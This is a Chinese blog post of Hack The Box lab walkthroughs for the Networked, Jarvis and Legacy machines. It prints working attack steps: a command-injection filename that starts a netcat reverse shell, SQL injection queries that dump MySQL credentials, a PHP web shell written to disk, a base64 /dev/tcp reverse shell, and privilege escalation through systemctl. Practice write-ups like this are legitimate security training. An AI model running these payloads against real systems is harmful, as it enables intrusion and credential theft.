HTB-oscplike-Networked+Jarvis+Legacy

最新推荐文章于 2024-01-10 23:44:33 发布
最新推荐文章于 2024-01-10 23:44:33 发布
阅读量267 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53302733/article/details/123945078
版权

HTB-oscplike-Networked+Jarvis+Legacy

Networked

easy难度的networked 靶机IP 10.10.10.146

sudo nmap -sC -sV -A -p- -Pn --min-rate=5000 10.10.10.146
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
443/tcp closed https

dir扫到/backup里面有源码可以审计
这里就是常规的改image/jpeg 头上加GIF89a 后缀名.php.jpg就可以绕过
然后根据代码在photos.php看到路径访问就弹回了shell
但是拿不到user的flag 权限不够
在/home/guly下发现check_attack.php会定时执行
其中有 exec(“nohup /bin/rm -f p a t h path pathvalue > /dev/null 2>&1 &”);
那么我们在path下新建一个文件名也就是value值为
;nc -c bash 10.10.14.21 7890;
然后静待执行弹回shell就行了 拿到flag 526cfc2305f17faaacecf212c57d71c5

这里不知道为什么一直有另外一台机器连我这个端口 可能是之前做的机子的后门代码还在
不知道哪个啥比半天做不出来一直连我 干脆换了个端口

继续提权 sudo -l发现能root执行changename.sh 分析代码看到ifcfg
直接google ifcfg exploit发现可以进行空格绕过 照做拿到root

0a8ecda83f1d81251099e8ac3d0dcb82
请添加图片描述

Jarvis

medium难度的jarvis 靶机IP 10.10.10.143

sudo nmap -sV -sC -A --min-rate=5000 -p- -Pn 10.10.10.143
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
64999/tcp open http Apache httpd 2.4.25 ((Debian))

后台扫出一个phpmyadmin 同时在
/room.php?cod=1%20order%20by%207%20–+
发现有sql注入 正确时会返回图片
常规注入发现有七列 同时2,3,4,5都是回显列
/room.php?cod=-1 union select 1,group_concat(schema_name),3,4,5,6,7 from information_schema.schemata 得到库名 里面mysql库是有用的

http://ip/room.php?cod=-1 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=‘mysql’ 看到里面有user表

http://ip/room.php?cod=-1 union all select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name=‘user’
爆出user password字段

http://ip/room.php?cod=-1 union all select 1,group_concat(User,Password),3,4,5,6,7 from mysql.user

DBadmin*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
MD5解密一下是imissyou 以此进入phpadmin后台

SELECT “<?php system($_GET['cmd']);?>” INTO OUTFILE “/var/www/html/shell3.php”
本来想直接写弹shell 但是好像写不进去不知道为啥
这里稳妥一点直接用base64弹shell
echo -n ‘bash -i >& /dev/tcp/10.10.14.21/7888 0>&1’ | base64 -w 0

http://ip/shell3.php?cmd=echo -n YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTA
uMTAuMTQuMjEvNzg4OCAwPiYx | base64-d | bash

弹回一个低权限shell sudo -l看见
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
发现可以执行ping命令 但是分析代码发现过滤了;|等字符
这里可以用 $(command)绕过 会先执行里面的命令
由此拿到user的flag 2afa36c4f05b37b34259c93551f5c44f

继续提权 执行linpeas发现suid权限有一个systemctl标黄
https://gtfobins.github.io/gtfobins/systemctl/#suid

参照这个 wget一个写好的xxx.service过来
/bin/systemctl link /home/pepper/bbb.service
/bin/systemctl enable --now /home/pepper/bbb.service
弹出来root的shell 拿下flag
d41d8cd98f00b204e9800998ecf84271
请添加图片描述

接下来打算打几天windows的机器了 感觉套路都差不多 windows提权还属实不太懂

Legacy

easy难度的legacy 靶机IP 10.10.10.4 第一台windows开始咯

sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.4
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
这长得纯纯就是永恒之蓝的形状了
nmap --script smb-vuln* 10.10.10.4 -Pn -p 445 看到ms08-067也行
随便弄个脚本就上去了 直接就能拿两个flag

e69af0e4f443de7e36876fda4ec7644f
993442d258b0e0ec917cae9e695d5713
看来前几台机子总是浪费时间的

请添加图片描述

ore0
关注
HTB Legacy[Hack The Box HTB靶场]writeup系列2
重新启程
02-01 1621
Retired Machines的第二台,前面的靶机都是比较简单的,通常都是适应性的训练,找到合适的突破点就可以了。 目录 0x00 靶场介绍 0x01 端口扫描 0x02 samba服务 0x03永恒之蓝 0x00 靶场介绍 Legacy这台靶机是windows靶机,我们之前在Vulnhub上使用的靶机基本上都是linux操作系统。那么我们就来看看这台靶机是什么情况。 先看下...
HTB靶场系列 Windows靶机 Legacy靶机
m0_57221101的博客
01-27 1972
勘探 常规nmap扫描 root@kali# nmap 10.10.10.4 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 20:30 EST Nmap scan report for 10.10.10.4 Host is up (0.018s latency). Not shown: 65532 filtered ports
oscp——HTB——Legacy
王嘟嘟的博客
04-26 543
0x00 前言 乘着网好,赶紧做一做。 难度 入门 1级 (基本没啥难度) 0x01 信息收集 常规上nmap 看了一下目标版本,这里是2003 看到这里看到445以及版本,永恒之蓝没得跑了。 0x02 usershell and rootshell 可以直接开启msf,进行搜索 search smb 获取到shell 首先是找到user.txt 然后找到root.txt ...
HTB-oscplike-Bastard+Granny
m0_53302733的博客
04-05 1126
HTB-oscplike-Bastard+Granny Bastard medium难度的bastard 靶机IP 10.10.10.9 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.9 80/tcp open http Microsoft IIS httpd 7.5 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Win
shaper-scripts:示例防火墙 + HTB + IMQ
05-29
信息 ifconfig eth0: flags=4163<UP> mtu 1500 inet 192.168.120.160 网络掩码 255.255.255.0 广播 192.168.120.255 inet6:80:40ffab0c0c 前缀:80:40ffab0c00c 前缀:280:4000c0c e8:fa:b3 txqueuelen 1000 ...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
HTB侦察 关于 该脚本创建一个多窗格多窗口tmux会话。 为不同的任务创建不同的窗格。 自动为您键入基本的枚举命令,只需按Enter键即可。 要求 Tmux sudo apt install tmux 马斯坎 地图 哥布斯特 ffuf(安装并将其...
htb-beep
m0_55772907的博客
09-15 952
一般
【Hack The Box】linux练习-- Networked
人间体佐菲的博客
11-21 544
【Hack The Box】linux练习-- Networked
HTB-jarvis
最新发布
li1136594919的博客
01-10 1578
这个靶机不难,但走的弯路需要记录下来。①sqlmap注入写入文件时,最开始使用的是kali自带的php-reverse-shell.php文件,执行命令之后去浏览器访问发现没有上传成功,又没看sqlmap打印出来的信息,以为/var/www/html/不能写入文件,去找其他攻击向量;最后还是试遍其他可能,没有攻击向量了,想着这个是不是能一步步排查,先上传仅有test字符的1.txt文件,浏览器能够成功访问,然后手写php一句话木马,继续上传成功才发现是文件过大造成上传失败!
No.3-Jarvis-难度普通-HTB-walkthrough
weixin_43851945的博客
01-22 449
No.3-Jarvis-难度普通-HTB-walkthrough ** 挺有意思的一台机器,有挺多种方式拿 low priv shell。 ** 攻击机:官方Kali linux 2019 64位 作者:Ikonw 靶机介绍 一,端口扫描 只有HTTP 比较有兴趣,title 是 Stark Hotel Starting Nmap 7.80 ( https://nmap.org ) at 202...
【Hack The Box】linux练习-- Jarvis
人间体佐菲的博客
11-21 349
【Hack The Box】linux练习-- Jarvis
hackthebox- Jarvis(考点:sql注入/mysql/systemct提权)不用sqlmap
冬萍子癸水
04-14 535
此靶机大多数人用的sqlmap。针对oscp,本文章未用sqlmap。其实现实场景中用sqlmap的也不多,会封IP的,不会让你扫来扫去。所以学习手工注入也很必要。在手工注入里也可以利用文件包含漏洞。 nmap 很常规,一开始又没ssh密码,当然是从80网页开始搜集信息。以及dirbuster扫它 发现phpadmin,但是没密码,继续看80 像这种改一个展示的东西,网址里的数字就变了一个,这...
靶机渗透_hackthebox__jarvis -7
qq_34717555的博客
11-11 609
目标IP:10.10.10.143 Nmap scan report for supersecurehotel.htb (10.10.10.143) Host is up (0.28s latency). Not shown: 939 closed ports, 58 filtered ports PORT STATE SERVICE VERSION 22/tcp open ss...
apache httpd sever在debian下的部署和配置以及最重要的常见漏洞解析
qtttgeq的博客
04-17 1102
Nginx(发音同engine x)是一款由俄罗斯程序员Igor Sysoev所开发轻量级的网页服务器、反向代理服务器以及电子邮件(IMAP/POP3)代理服务器。起初是供俄国大型的门户网站及搜索引擎Rambler(俄语:Рамблер)使用。
Apache安装中出现443端口被占用的解决方法
Wannna的博客
03-14 3491
安装apache web服务器中,执行httpd -k install时出现如下错误。 (OS 10048)通常每个套接字地址(协议/网络地址/端口)只允许使用一次。 : AH00072: make_sock: could not bind to address [::]:443 (OS 10048)通常每个套接字地址(协议/网络地址/端口)只允许使用一次。 : AH00072: make_s...
No.169-HackTheBox-Linux-Networked-Walkthrough渗透学习
qq_34801745的博客
07-20 690
** HackTheBox-Linux-Networked-Walkthrough ** ¬ 靶机地址:hackthebox.eu/home/machines/profile/203 靶机难度:初级(3.8/10) 靶机发布日期:2019年11月14日 靶机描述: Networked is an Easy difficulty Linux box vulnerable to file upload bypass, leading to code execution. Due to improper san
ROS3.30配置4M ADSL HTB+PCQ限速指南
"ROS3.30_4M_ADSL使用HTB+PCQ限速实例.pdf" 在本文档中,我们讨论了如何在RouterOS(ROS)版本3.30下,对4M ADSL连接应用HTB(Hierarchical Token Bucket)和PCQ(Per Connection Queue)进行流量限速的实例。这是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值